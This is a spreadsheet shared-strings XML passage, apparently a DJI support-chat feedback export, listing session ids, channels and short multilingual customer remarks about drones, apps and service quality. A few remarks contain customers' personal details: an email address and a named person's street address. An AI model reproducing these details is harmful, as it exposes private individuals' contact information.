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0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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="5938" uniqueCount="3657">
  <si>
    <t>售前/售后</t>
  </si>
  <si>
    <t>英文/小语种</t>
  </si>
  <si>
    <t>id</t>
  </si>
  <si>
    <t>渠道channel</t>
  </si>
  <si>
    <t>会话chatSessionId</t>
  </si>
  <si>
    <t>客户名称customer</t>
  </si>
  <si>
    <t>提交时间</t>
  </si>
  <si>
    <t>remark</t>
  </si>
  <si>
    <t>sessionId</t>
  </si>
  <si>
    <t>starLevel</t>
  </si>
  <si>
    <t>意图分类</t>
  </si>
  <si>
    <t>售后</t>
  </si>
  <si>
    <t>小语种</t>
  </si>
  <si>
    <t>1a27627085a5429642e01bf093fa1b12</t>
  </si>
  <si>
    <t>fr_sp14</t>
  </si>
  <si>
    <t>|82722338844351652280680</t>
  </si>
  <si>
    <t>xeOlU08FEWxgQ/GPTAOtB2Lb14bLBdVssoBJaO6Rmt4=</t>
  </si>
  <si>
    <t>Image et vidéo floue. Calibration effectuée mais sans qucces</t>
  </si>
  <si>
    <t>dD9Z78MwdcOfUMHnYSn4I2Iqunxk1U+NJ6M7ew17J7E=</t>
  </si>
  <si>
    <t>售前</t>
  </si>
  <si>
    <t>英文</t>
  </si>
  <si>
    <t>bc13dd98cff4e1ef34255b384f7e59dc</t>
  </si>
  <si>
    <t>na_store1</t>
  </si>
  <si>
    <t>|82721611706522805172248</t>
  </si>
  <si>
    <t>P0TM1tGN2wnX6NqycUNXqSjfekXFiq89l6DbGIQnJbA=</t>
  </si>
  <si>
    <t xml:space="preserve">It was terrible. Didn't have any idea what I was typing and no answer provided at all. </t>
  </si>
  <si>
    <t>4EmKhdRjzdqocpYxkDYYLQ==</t>
  </si>
  <si>
    <t>d7bf3e0cef29633f9c70bf503ad4ff79</t>
  </si>
  <si>
    <t>kr_sp1</t>
  </si>
  <si>
    <t>|82719083069823665910377</t>
  </si>
  <si>
    <t>HHggJOf8+6oyAcckYAlxe+GVYHdv1ERXOfJJAeHTXc8=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>보험입력은</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>어디에서</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>하나요</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t>??</t>
    </r>
  </si>
  <si>
    <t>tZWu6xs/+2CslfYyIA9VYt+Vfsl+MXM+LxMDuTgNe2g=</t>
  </si>
  <si>
    <t>7a926747cf9a3cc06fa02667c3def769</t>
  </si>
  <si>
    <t>|82719092375773755136594</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>보험</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>입력은</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>어떻게</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>하는지요</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t>??</t>
    </r>
  </si>
  <si>
    <t>1f3c8afd472b622be01a374626850a4b</t>
  </si>
  <si>
    <t>eu_sp1</t>
  </si>
  <si>
    <t>|82722022632643528686558</t>
  </si>
  <si>
    <t>/EcXgzSuZp1Q+vxjyCnJfQ==</t>
  </si>
  <si>
    <t>How do i return my drone under DJI care refresh</t>
  </si>
  <si>
    <t>YRLUnBgXPdvPJXTKRdqAGnyKWz2mmZNkPkYxUUyE3c0=</t>
  </si>
  <si>
    <t>51ad91b00707f04f02a3277f243ac88d</t>
  </si>
  <si>
    <t>|82720088856555504384982</t>
  </si>
  <si>
    <t>aaE0NHVK9Pqtm5Db+pOw+2F1N/W5aWE9wFr8av69TC0=</t>
  </si>
  <si>
    <t xml:space="preserve">I need to send the dji mini 3 for repair. Do I need to send the controller screen too? </t>
  </si>
  <si>
    <t>4F630E/QVQLg+MY1F4Zcf4RIIQYBTN1vCV4Nbw9vsds=</t>
  </si>
  <si>
    <t>dd75a2d2a9d7f310ab78366714d1ea8b</t>
  </si>
  <si>
    <t>au_sp1</t>
  </si>
  <si>
    <t>|82717494056064797830250</t>
  </si>
  <si>
    <t>Oqtxy8Egm5laNetQi/54bbo1jo4Ur+lC1o5yxWoN+yQ=</t>
  </si>
  <si>
    <t>null</t>
  </si>
  <si>
    <t>c4297d468d8151d095a86c517c4499ab</t>
  </si>
  <si>
    <t>fb_sp1</t>
  </si>
  <si>
    <t>|82717578883945648114740</t>
  </si>
  <si>
    <t>qhxKMj6BXLpcTP05Qz0L0A==</t>
  </si>
  <si>
    <t>MY DRONE IS LOST</t>
  </si>
  <si>
    <t>1SvU0uLJiNjiGTBghgZb3Jt5HUAk2S8v6ZNSTfM5iGI=</t>
  </si>
  <si>
    <t>9f6772a7129576a5f35e18c28b21a5a8</t>
  </si>
  <si>
    <t>|82717590080305771841365</t>
  </si>
  <si>
    <t>Zb7vanS7/S76foT8grzNZPMK5oOTKLdKy6sGuWC9utM=</t>
  </si>
  <si>
    <t>Kann man die Drohne Mini 4 Pro ohne Fernsteuerung kaufen ?</t>
  </si>
  <si>
    <t>119n1zZcYruxXqLuz67h86eAQyairrlWZ5mm3V693Yk=</t>
  </si>
  <si>
    <t>31562a47ef733649d41e84beec4750d6</t>
  </si>
  <si>
    <t>|82717593982015831710169</t>
  </si>
  <si>
    <t>Kann man die Drohne Mini 4 Pro  ohne Fernsteuerung kaufen ?</t>
  </si>
  <si>
    <t>80009ed40f820df2b1ef6863488d60d3</t>
  </si>
  <si>
    <t>na_sp1</t>
  </si>
  <si>
    <t>|82717613991376152463527</t>
  </si>
  <si>
    <t>FPqlH1IVAl7DBjUmIKhj3nnS/kgfDQN/1RXEOWAMK4U=</t>
  </si>
  <si>
    <t>How do I download the DJI app for a mini 4k</t>
  </si>
  <si>
    <t>odcqSPgsCcdLdu3+ZdDoLCCh8gnCVrxOMQ5rWRL2+24=</t>
  </si>
  <si>
    <t>b1eafed8f30b699d1f5795b025dd44c8</t>
  </si>
  <si>
    <t>|82718141083712962164149</t>
  </si>
  <si>
    <t>wIqi/cNKhXZL5fnhghtOKxrulkNhr4q/bwh4l0qVz4U=</t>
  </si>
  <si>
    <t>d613e73ecbb68a51c927f05372919893</t>
  </si>
  <si>
    <t>au_store1</t>
  </si>
  <si>
    <t>|82718099423222728995836</t>
  </si>
  <si>
    <t>m7JI5AB00DUuW4dbEu8QT+S4GVFZ6EfGKuthh6cX+KA=</t>
  </si>
  <si>
    <t xml:space="preserve">Hi which monitor hood is compatible with the mini 3 pro  </t>
  </si>
  <si>
    <t>uexkMqETiuJOEyGNVKYe0RMfnzOvCdaYxVw93z2iiPs=</t>
  </si>
  <si>
    <t>5f9835823654a6ec3dd3e701ca504b62</t>
  </si>
  <si>
    <t>|82718099655512729991251</t>
  </si>
  <si>
    <t>BHjQLGGW4Ju+QBpQYWX6Ig==</t>
  </si>
  <si>
    <t>Video verification page needs to be addressed! Instructional video does not work properly.</t>
  </si>
  <si>
    <t>Uwjr9plq2vk5CzfanwgsTw+QkzKIqfRELhWN0Ph8Ajs=</t>
  </si>
  <si>
    <t>59a57b3401164b890111169054ac1735</t>
  </si>
  <si>
    <t>|82716972322452979975646</t>
  </si>
  <si>
    <t>5g83cKyIwLDo+5uBiNwKPpzhUdp2LGMPbe4pB+Q+OYc=</t>
  </si>
  <si>
    <t>absolutely convoluted process</t>
  </si>
  <si>
    <t>cyi918EWVWztQFJCV37Kvkm1VfCJGUWBxi94nmZ59kc=</t>
  </si>
  <si>
    <t>5927b30c151e67ba47c83b460e1cf621</t>
  </si>
  <si>
    <t>eu_store1</t>
  </si>
  <si>
    <t>|82716221453126179585383</t>
  </si>
  <si>
    <t>QHOFFSALCsNlfJREegseuA==</t>
  </si>
  <si>
    <t>None of the dji apps work on my phones, s24 ultra and oppo x5 pro</t>
  </si>
  <si>
    <t>bwQBIjm3IFM5DEwJvQbo/1giHdYrfN7qlYx8V2U+bZI=</t>
  </si>
  <si>
    <t>31bf46fb8107e546469d8ac658280738</t>
  </si>
  <si>
    <t>fb_fly1</t>
  </si>
  <si>
    <t>|82716241516606735166846</t>
  </si>
  <si>
    <t>qGhW1UU68ADV9VZdxWgWlg==</t>
  </si>
  <si>
    <t>How can I fly higher than 120 m</t>
  </si>
  <si>
    <t>4ZZJcFpsM66rX5FlXWmh8ZFIR//QjQ4A4cR+k2pZhrI=</t>
  </si>
  <si>
    <t>d4ab2728c9f843708890fa22619bd5cb</t>
  </si>
  <si>
    <t>|82716234212476157915066</t>
  </si>
  <si>
    <t>TkHUCQ8ZpMKGDMe/Dx068Q==</t>
  </si>
  <si>
    <t xml:space="preserve">orribile service , they lost my order they called me several time for no news bad bad bad </t>
  </si>
  <si>
    <t>ocngstEU5iA8I7KE+EFNBV4fgw1lJcZKoKCSEXuvTRs=</t>
  </si>
  <si>
    <t>a076a59475ee0dc33a5af7fba9c9867e</t>
  </si>
  <si>
    <t>na_store15</t>
  </si>
  <si>
    <t>|82716556583291995468384</t>
  </si>
  <si>
    <t>UCCB1jSDu0Rx/w94lvgnwB/8rggnwWpmbTZijIVhxyw=</t>
  </si>
  <si>
    <t>0a63b360deacfdcc25ec12a7a7e5e4f1</t>
  </si>
  <si>
    <t>|82715201886505998447533</t>
  </si>
  <si>
    <t>Cih+cj3zECA7wzIvhbQKhg==</t>
  </si>
  <si>
    <t>Can this policy be cancelled. I will have to return the drone since the course has been cancelled...</t>
  </si>
  <si>
    <t>JEkS73veP704Ib4eMTldO96KUd8si9zszpmliCaThfk=</t>
  </si>
  <si>
    <t>621dc9926b8879ddf9501014d93cf877</t>
  </si>
  <si>
    <t>|82715280019727324322315</t>
  </si>
  <si>
    <t>y8AxGosMxKZBW+BuBv3gpw==</t>
  </si>
  <si>
    <t>993a7acfb733ed583907543f685af11b</t>
  </si>
  <si>
    <t>de_sp1</t>
  </si>
  <si>
    <t>|82715838461016468971301</t>
  </si>
  <si>
    <t>R8qRrM+piYHboexzKT2UHQ==</t>
  </si>
  <si>
    <t>Bad Service for the DJI Neo</t>
  </si>
  <si>
    <t>jsc7/yZBQLB0hxPhQAOWY3wuO6jl9jkoESfdVsGwEZM=</t>
  </si>
  <si>
    <t>3faaaafdadaa639faabf414f0e057a39</t>
  </si>
  <si>
    <t>|82715604383648808794339</t>
  </si>
  <si>
    <t>lDelP2A7to/tgC+pRXTdf7KxU7FR8iW2wd++/POXlZU=</t>
  </si>
  <si>
    <t>Didnt address the question at all</t>
  </si>
  <si>
    <t>3eLt0qp2CkHmI3oQk+o+3Qyct5joPrTjBGOnS+1WMcQ=</t>
  </si>
  <si>
    <t>f15c5a9e9e0df576123b5403918bdb4d</t>
  </si>
  <si>
    <t>|82714067040283775169814</t>
  </si>
  <si>
    <t>60iCn78snP0ZYDxAKr0Kpw==</t>
  </si>
  <si>
    <t>It gives 30 seconds to create and send a message and then times out.  I'm now trying 3rd time!</t>
  </si>
  <si>
    <t>g+vKQ7qS4wb7JXYaWiGluBIZgqDL74GB07mtkIrY3Qo=</t>
  </si>
  <si>
    <t>f10a4655df6ce04adb6ee1b052285d71</t>
  </si>
  <si>
    <t>kr_store1</t>
  </si>
  <si>
    <t>|82716151316453668853511</t>
  </si>
  <si>
    <t>U0nQfCLk6aF0hrVBTyJvirHv/dOdgCs0k0qkdSdBQtg=</t>
  </si>
  <si>
    <t>fe53bc1dcc8fde750d3465f6af6bc31d</t>
  </si>
  <si>
    <t>de_store1</t>
  </si>
  <si>
    <t>|82716155216943776835206</t>
  </si>
  <si>
    <t>Ne8j1/C1UF5AgKQP2J5jN52xuKN7f99oYXD4CwKw3mE=</t>
  </si>
  <si>
    <t>Ihr von DJI seid die Besten! Super Service super Job den ihr da alle Hinlegt. Würde mich über so ein</t>
  </si>
  <si>
    <t>sVt0Brvj3IedWPLJtG1VTPUdjWQe0J0w0kV+mnlkOPQ=</t>
  </si>
  <si>
    <t>00fa672808ad17618aede708eadbfd3c</t>
  </si>
  <si>
    <t>|82713266828777798969177</t>
  </si>
  <si>
    <t>4JuBWHoCLqnsNdxxQAIT5g==</t>
  </si>
  <si>
    <t>ffa87d586482337b4a155f47be9a0795</t>
  </si>
  <si>
    <t>en_other18</t>
  </si>
  <si>
    <t>|82712282245717679216367</t>
  </si>
  <si>
    <t>PqvRZ7MuHnENmBwo8tlNcn8yeaVuHCoAOFmcRBZ6M7Y=</t>
  </si>
  <si>
    <t xml:space="preserve">On my DJI Phantom for pro it reads Gimble not connected. Please tell me what I can do  </t>
  </si>
  <si>
    <t>7R0wRGNTbXvHW3Dsa/UWtEbjYDSPVYbFmZVNj/YYE0w=</t>
  </si>
  <si>
    <t>a471629180b21901ffeedff34eb60e15</t>
  </si>
  <si>
    <t>|82711937568184910198713</t>
  </si>
  <si>
    <t>qUyPiouF70wEoxbdT1EuOzLq9cG3WyK/kHscVc3O7r0=</t>
  </si>
  <si>
    <t>I cant get an answer to where to get Phantom 2 fly app for Android. Contact me at akanyr@yahoo.com</t>
  </si>
  <si>
    <t>St3fNCmy0YWvu62W4xyGea9xMeHcjKRC0HgNFGt8hR0=</t>
  </si>
  <si>
    <t>6e05ef017b1f4ace15822b39843fd628</t>
  </si>
  <si>
    <t>|82710531492769550943047</t>
  </si>
  <si>
    <t>6yp7guDzc5cKiBpmFsdvew==</t>
  </si>
  <si>
    <t>Not helpful in anyway, a distraction hoping to frustrate and delay.</t>
  </si>
  <si>
    <t>/S4Y/ExAc3LXcK8mkxcfWsWoCn1OjRUSFIOexv4MCxk=</t>
  </si>
  <si>
    <t>ed7ec5b512d9a097239766252d2c17bd</t>
  </si>
  <si>
    <t>|82710622970971772796153</t>
  </si>
  <si>
    <t>Ae0M9BXwM25icnh8yCEDcQ==</t>
  </si>
  <si>
    <t>I wasnt finished tying my problem and you cut me off . Very poor service!!</t>
  </si>
  <si>
    <t>h/tP8Kwa/IsSSepia2Aw7AwqPOqYIB3j35hPPIq4xjg=</t>
  </si>
  <si>
    <t>a8dcd1820fe0aa9cc999fa5d935c0353</t>
  </si>
  <si>
    <t>|82711823410283820039609</t>
  </si>
  <si>
    <t>V/iUUDIMxmkx1bT760k31aNS8H2J4+UkC39unTy9Cow=</t>
  </si>
  <si>
    <t>2da3054cc108a81a8737ba89e7987c6d</t>
  </si>
  <si>
    <t>|82709800003141939359769</t>
  </si>
  <si>
    <t>IQmTFZjeNp4uu0W1KGri9h42vrTVRgw2efTqwxrvqvQ=</t>
  </si>
  <si>
    <t>consumers need more specific responses</t>
  </si>
  <si>
    <t>UqUQo3DQDhGTlq+8xj7qFg9c+qvcLY2iVgGQti/CH80=</t>
  </si>
  <si>
    <t>23980d04191ddc99cf31fb236836bc77</t>
  </si>
  <si>
    <t>|82712767593272570817216</t>
  </si>
  <si>
    <t>1SlzWkRGtqRTZEkMmu626A==</t>
  </si>
  <si>
    <t>dji osmo action 3 aus dem konto entfernen</t>
  </si>
  <si>
    <t>z5b1MbEZFR33mo9ESjwlBrX71ySGC2czmrXjEOcOcho=</t>
  </si>
  <si>
    <t>b9a213fb906d4bd2a0a8a50c2681324b</t>
  </si>
  <si>
    <t>|82709900926555072185160</t>
  </si>
  <si>
    <t>ucxktj6AGTV8/VPULOZUo+8PMjGzDB0hSzddUxhbIak=</t>
  </si>
  <si>
    <t xml:space="preserve">It gave me some alternatives on how to charge my controller or to send it in for diagnosti and fix. </t>
  </si>
  <si>
    <t>P6jbgL0gkOzjpjQ6Oen9OAiVBTOq1PFQ3ETFt3SvHCk=</t>
  </si>
  <si>
    <t>77d2351fc5734180ed6cfd781e223fb2</t>
  </si>
  <si>
    <t>|82709923644936315276285</t>
  </si>
  <si>
    <t>mbzdxmZ2hamBsIYP93+jKq7aKWyPhUBtVx0vsjHRr7o=</t>
  </si>
  <si>
    <t>didnt get any respond</t>
  </si>
  <si>
    <t>E+R9VCkMLh+5SPUlVj97lC9Y6v2WuRF8fSHsuiMc0YE=</t>
  </si>
  <si>
    <t>dc781f498b4f1a7d9c18f753c952a5be</t>
  </si>
  <si>
    <t>|82710078811002254479847</t>
  </si>
  <si>
    <t>6bduGhjgXMlS4RZPuRJb7g==</t>
  </si>
  <si>
    <t>Hello!</t>
  </si>
  <si>
    <t>lAH92v9ToxGQAERufcsyqsBU0Jf3UE8Bsv5SLFOhMpU=</t>
  </si>
  <si>
    <t>200672603f07d2dcb0fba91173ca6748</t>
  </si>
  <si>
    <t>|82710292436269767140444</t>
  </si>
  <si>
    <t>JD01O1qUD1+OBBD31Yvoxtb1Bqxdk22pfBqqkiXTbUY=</t>
  </si>
  <si>
    <t>Camera is moving after power off the pocket 2. Please answer my question</t>
  </si>
  <si>
    <t>NxUgb+Qc6T9fwsBj7sZTlfeMQ2rwOEGNPi0hi18qeOE=</t>
  </si>
  <si>
    <t>28b8c1fd77376b0fba678533c189d585</t>
  </si>
  <si>
    <t>|82708882723787485689085</t>
  </si>
  <si>
    <t>Sh37Lqkz0fbg5K+9gX/QBg==</t>
  </si>
  <si>
    <t>More flight experience with DJI Neo</t>
  </si>
  <si>
    <t>hSLL60cq9fScsHqn+gd4Tx47qpWUWLwELG7MJYU7FmA=</t>
  </si>
  <si>
    <t>48dd7b20851a87fa8c158b03fe3a08b0</t>
  </si>
  <si>
    <t>|82708960179762981141910</t>
  </si>
  <si>
    <t>WIay0Zsi8L60XUAKCzPn+9ljylCT96qGcppgwokTbVM=</t>
  </si>
  <si>
    <t>I  have a  action 5 Pro    i  can  not   download   video  files    to  my  i phone 15  on the  mimo</t>
  </si>
  <si>
    <t>WbVhPVj5n0/y6DIx1ECaXw==</t>
  </si>
  <si>
    <t>94278db5536d7fe6f236205116ad4d3e</t>
  </si>
  <si>
    <t>|82709526533727165731502</t>
  </si>
  <si>
    <t>jXotkRUJ7ZZ7T8d2mcxgJK7D6Xc18au+vVrOK74o464=</t>
  </si>
  <si>
    <t>Never got to chat to a live assistant</t>
  </si>
  <si>
    <t>htZJIypnTAWbi6MknnWrNnRDYUUcCDpG6VXQ/fglbCc=</t>
  </si>
  <si>
    <t>5ebc6289472860f7e96e05135f447c6c</t>
  </si>
  <si>
    <t>|82709118819837473936389</t>
  </si>
  <si>
    <t>96b1vaWwy85EWCxjYbDcsov/Q4M86KWW4y03h6LSFj8=</t>
  </si>
  <si>
    <t xml:space="preserve">this page is to technical! I purchased the extended warranty, my unit broke and I need it fixed  </t>
  </si>
  <si>
    <t>Y1rODy0Uw/GpUvdN+TX9jr0qoQxeP5rcAFSNYsgdxKU=</t>
  </si>
  <si>
    <t>a30984bb75d924d83dac1b4c6c6ca3da</t>
  </si>
  <si>
    <t>|82708897304431413287590</t>
  </si>
  <si>
    <t>MZ9dEIxcRCzQY1rNPvfNLw==</t>
  </si>
  <si>
    <t>e5311d4eaab14245225566aa8b6dbabe</t>
  </si>
  <si>
    <t>|82709147034038466710545</t>
  </si>
  <si>
    <t>y5taOyRcxIrMA314YKm4Ig==</t>
  </si>
  <si>
    <t>Did not get to chat with a human being.</t>
  </si>
  <si>
    <t>5do//EibIcFDT3BuAX/EgOaS0GgmeI2i4QyDaeGdVU8=</t>
  </si>
  <si>
    <t>01e9976f7fe90823c5c1e16e60aa5ba8</t>
  </si>
  <si>
    <t>|82708396128542345158562</t>
  </si>
  <si>
    <t>pJVqinqqy0HBe/v84IgVwFqRLXQ0NR6SdlmE2ghRxJo=</t>
  </si>
  <si>
    <t xml:space="preserve">Hi I'm having problem activating my dji pocket 2 with my Samsung note 10 can you please help me </t>
  </si>
  <si>
    <t>PDe/iDhnpTBuy4HLGDNggmDTU7vFqiSbl8VXkrnmHkQ=</t>
  </si>
  <si>
    <t>d12e26b2d6304a83ab28c46b491a83a4</t>
  </si>
  <si>
    <t>|82707248747898012533759</t>
  </si>
  <si>
    <t>l+6qroNgEN0SJKkCVSV5pxHmXSgELDszkQgtHuoWllQ=</t>
  </si>
  <si>
    <t>Please following address. Richard Pierce, 295 seven farms drive, suite C - 158 - Daniel Island 29492</t>
  </si>
  <si>
    <t>GgAUbIwL8ZxKgYwe7YW7/HTDvFYCUVCW0LsqDdi1rpI=</t>
  </si>
  <si>
    <t>410719ac1805abedeb16cd9d223660d8</t>
  </si>
  <si>
    <t>|82707640182817324189014</t>
  </si>
  <si>
    <t>jOd5bKaX7OxjuiXDjgroOnZhpVrNITq70DrWUXcf40w=</t>
  </si>
  <si>
    <t>not resolving my problem</t>
  </si>
  <si>
    <t>snoenIooZb5XsFYMAUfGfBnUpNKQqmShZ1dT673yNkk=</t>
  </si>
  <si>
    <t>9498ec3e8dca177eb9d222e6136593fd</t>
  </si>
  <si>
    <t>|82707875547243103879199</t>
  </si>
  <si>
    <t>6EDSCgxr2LUGSI7N3r4IPg==</t>
  </si>
  <si>
    <t>Not even close to asking the questions needed to assist me. Waste of time</t>
  </si>
  <si>
    <t>AZbAXLBEwNTXfAKpXyRku30kYtGwqLqgu1/qgnWaslk=</t>
  </si>
  <si>
    <t>2dcf3371e4f02b83e977696d606a4953</t>
  </si>
  <si>
    <t>|82706552491028036498263</t>
  </si>
  <si>
    <t>obSZzxoQGdk+H8JSzhSEMeKen34wNQngvux1GjuksQM=</t>
  </si>
  <si>
    <t>3a1f3bae54462564271f9d1d31965583</t>
  </si>
  <si>
    <t>|82706499745917203154840</t>
  </si>
  <si>
    <t>DdIbAPP22a2/rQXd5pndIFrlzvxzkHIElULHjL6UT1o=</t>
  </si>
  <si>
    <t>I can't find the service. I have broken clips on my new dji mini 4 pro bettery ... It's impossible t</t>
  </si>
  <si>
    <t>xaQRrGe1/bwqhQMMcDjXQ/pbsSdq8ZS0ax09OtwLeNk=</t>
  </si>
  <si>
    <t>471c29e715a196e1c0e19ad9f1fb9572</t>
  </si>
  <si>
    <t>|82706663357409950154659</t>
  </si>
  <si>
    <t>u19bcqD7QeHhUkM5oLnEy8cMo6b7jivTo+tIRhVSsMo=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>감사합니다</t>
    </r>
  </si>
  <si>
    <t>yUP8Q712eL8fhZH9EcYtRfv6VKMnvXTKfK0jIEEyRCc=</t>
  </si>
  <si>
    <t>da55dd0953a3a75f4e26a17e07267037</t>
  </si>
  <si>
    <t>|82706753390261728734888</t>
  </si>
  <si>
    <t>XVVMOz2TWD0ve8Hf2MphM5s2DpNJpHnAUh4vnj+z1Ec=</t>
  </si>
  <si>
    <t>Need a talk tobreal person</t>
  </si>
  <si>
    <t>S86PGfSgDZawf8/kOR6UKUNkn6N0k72/gWEgMl6d6ks=</t>
  </si>
  <si>
    <t>057f239efdc3ebf14496a842a553d035</t>
  </si>
  <si>
    <t>|82707121854345371848011</t>
  </si>
  <si>
    <t>I6cKKqJ4snmv/HhRPE+lwQ==</t>
  </si>
  <si>
    <t>Thank you</t>
  </si>
  <si>
    <t>jGhwBiBtRfqKuemA7sJZ2MQyfTxb5rPii+befsoxVu8=</t>
  </si>
  <si>
    <t>810805343849defe6a8086f45f323e05</t>
  </si>
  <si>
    <t>|82704530067105800090488</t>
  </si>
  <si>
    <t>RkG2hVlSOGmKAcUxQ0Eq9GypNYnVe4MzpDuS/DFk5Dw=</t>
  </si>
  <si>
    <t>get better customer support, weirdos,</t>
  </si>
  <si>
    <t>5gGhvnkXAKycounk6XmHWwE7tZmhLuKyvaPnu2+LW9U=</t>
  </si>
  <si>
    <t>36a58c91454d4df61b16a61f9a497591</t>
  </si>
  <si>
    <t>|82703479770061934743156</t>
  </si>
  <si>
    <t>uemPI9JqfJt8cvSezqu3VgnfD1CYRnom7pF5pZUvkxo=</t>
  </si>
  <si>
    <t>5a606f6f9704d362cb94d406d7759c9e</t>
  </si>
  <si>
    <t>|82704305281382742691641</t>
  </si>
  <si>
    <t>sJn2YxBOEoS2Rnv5BO50jQ==</t>
  </si>
  <si>
    <t>please feedback for my order 0487082813778 canceled, payment has been delivered.</t>
  </si>
  <si>
    <t>VtIXrRTQaw3MR+56GcDFkRRkBrtMn0LkgpwY9ieDcoY=</t>
  </si>
  <si>
    <t>3eb4e28b50294e616bf94f43c0a44656</t>
  </si>
  <si>
    <t>|82704169197899905862542</t>
  </si>
  <si>
    <t>5gbSUyCTJHiV9PqAVAHCGPRIGL4gziOlbz9hi8cgklQ=</t>
  </si>
  <si>
    <t>rubbish's compony which stop supporting the first client wihich have DJI mavic Mini 4k  shame on you</t>
  </si>
  <si>
    <t>ZmfnFMyg3e4fmlAwS6Nx8/+vVxrLzZJ7+oyv5X+ad8A=</t>
  </si>
  <si>
    <t>9bb10ef2538f57fb409ba27c6fba02de</t>
  </si>
  <si>
    <t>|82704997331238983674459</t>
  </si>
  <si>
    <t>访客-432c14</t>
  </si>
  <si>
    <t>47f32dcb56df17226623788fa3d07fa7</t>
  </si>
  <si>
    <t>|82703139315098194495481</t>
  </si>
  <si>
    <t>nMMUm45raoxkFetNgyXGTg==</t>
  </si>
  <si>
    <t>842d28ff5160618ac34bd14b2036ca89</t>
  </si>
  <si>
    <t>|82702162599446614269358</t>
  </si>
  <si>
    <t>55XIbhC66BTAmf8Y88Q0ww==</t>
  </si>
  <si>
    <t>No one replied and then the chat was closed....</t>
  </si>
  <si>
    <t>Jv33An3RYfbIKDrk/T5nGGsvSzjq1uZvR+gKCK5C+EA=</t>
  </si>
  <si>
    <t>bdb3f67b26094493fe1eab415c78c68e</t>
  </si>
  <si>
    <t>|82702549925456387817802</t>
  </si>
  <si>
    <t>Bk1wx2EBMBQkwJ/gP3b93g==</t>
  </si>
  <si>
    <t>443bc9a439be9b5be43859a56452ad0b</t>
  </si>
  <si>
    <t>|82702616373787113456930</t>
  </si>
  <si>
    <t>ms4lIxKtv8oGXREJ0BbjmsI74P9lSKI6B0zmDSB5IGs=</t>
  </si>
  <si>
    <t>I can't get anything to download to my Samsung s23 android for fly app??? I'm getting frustrated!!!</t>
  </si>
  <si>
    <t>roX5RUBfvrtCARgwmxYhoUfPl4p2o3JGn5dr5XQht7o=</t>
  </si>
  <si>
    <t>c52b6289f0eb1116e416bbaa7f8156a8</t>
  </si>
  <si>
    <t>|82701052318174739627003</t>
  </si>
  <si>
    <t>Hd3ZXNXOBtne1iYns4JUaOR0bIIx085UN55arMIw7FA=</t>
  </si>
  <si>
    <t xml:space="preserve">Cancel my order </t>
  </si>
  <si>
    <t>sH/E8XPygsyckjTZfpGed2enuBTeWTqfNjr5o5T2yWY=</t>
  </si>
  <si>
    <t>9416a7526a60d70ce6f06c99ac115a94</t>
  </si>
  <si>
    <t>|82701082894141704766712</t>
  </si>
  <si>
    <t>/SbNrlRVWF2xnxr9xvWCYw==</t>
  </si>
  <si>
    <t>need support for my MAVIC PRO</t>
  </si>
  <si>
    <t>prlWXWOuJnHt09UBT7y96MsqMDO3xO5IHOp+nU2ydiQ=</t>
  </si>
  <si>
    <t>4ff9af1b2137d9fc612cb5ef58c63e70</t>
  </si>
  <si>
    <t>na_mimo1</t>
  </si>
  <si>
    <t>|82701269974708534373991</t>
  </si>
  <si>
    <t>cQjuV36I0sc8NlHorMsw3A==</t>
  </si>
  <si>
    <t xml:space="preserve">Both reps I interacted with were very helpful and informative.   I appreciate it their mannerisms.  </t>
  </si>
  <si>
    <t>zcGhH92gWeWn7yQ/zHe8ueHsdaDgaEYQPxBH0SW54rU=</t>
  </si>
  <si>
    <t>710fe2f6af99c1657ecb546ffae553fa</t>
  </si>
  <si>
    <t>|82701965882572662863890</t>
  </si>
  <si>
    <t>CAu7g615GAkN/uxNowm73zuxHWdOOZ1X03386lOeng4=</t>
  </si>
  <si>
    <t>there was no chat session</t>
  </si>
  <si>
    <t>A4Tcjj/aNvAi4DLf8UAM97HRU95g72AycHb8+SY3sRE=</t>
  </si>
  <si>
    <t>28894e63b9bdede99829335adb35b4af</t>
  </si>
  <si>
